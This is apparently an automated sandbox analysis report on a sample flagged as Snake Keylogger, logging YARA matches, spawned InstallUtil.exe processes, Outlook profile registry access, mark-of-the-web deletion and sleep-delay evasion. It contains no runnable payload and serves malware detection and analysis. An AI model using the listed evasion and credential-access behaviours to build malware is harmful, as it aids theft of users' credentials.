Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5qJ6QQTcRS.exe.log Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: 5qJ6QQTcRS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5qJ6QQTcRS.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 5qJ6QQTcRS.exe ReversingLabs: Detection: 75%
Source: 5qJ6QQTcRS.exe Virustotal: Detection: 67%
Source: unknown Process created: C:\Users\user\Desktop\5qJ6QQTcRS.exe "C:\Users\user\Desktop\5qJ6QQTcRS.exe"
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: 5qJ6QQTcRS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 5qJ6QQTcRS.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: Yara match File source: 0.2.5qJ6QQTcRS.exe.3b01960.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5qJ6QQTcRS.exe.3ab6d70.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5qJ6QQTcRS.exe.5b60000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5qJ6QQTcRS.exe.5b60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5qJ6QQTcRS.exe.3b01960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5qJ6QQTcRS.exe.3ab6d70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1965003803.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_06129378 push esp; iretd 0_2_06129379
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_06127F80 pushfd ; ret 0_2_06127F89
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07574B80 pushfd ; retf 0_2_07574B81
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0757B105 push ebp; iretd 0_2_0757B106
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07692A46 push 00000033h; ret 0_2_07692A48
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0769EAC0 pushfd ; retf 0_2_0769EAC1
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07691153 push E8FFFFFDh; iretd 0_2_0769115D
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_076929A6 push 00000033h; ret 0_2_076929A8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07697D83 push ebx; retf 0_2_07697D84
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07F511B8 push FFFFFF8Bh; iretd 0_2_07F511BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F89C30 push esp; retf 00FCh 4_2_00F89D55
Source: 5qJ6QQTcRS.exe Static PE information: section name: .text entropy: 7.081769071361407

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe File opened: C:\Users\user\Desktop\5qJ6QQTcRS.exe\:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Section loaded: OutputDebugStringW count: 1939
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Memory allocated: E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Memory allocated: 29A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Memory allocated: 49A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Memory allocated: 8160000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Memory allocated: 9160000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Memory allocated: 9340000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Memory allocated: A340000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Memory allocated: A6F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Memory allocated: B6F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: BA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2A50000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: BA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599657 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599532 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599407 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599282 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599157 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599047 Jump to behavior
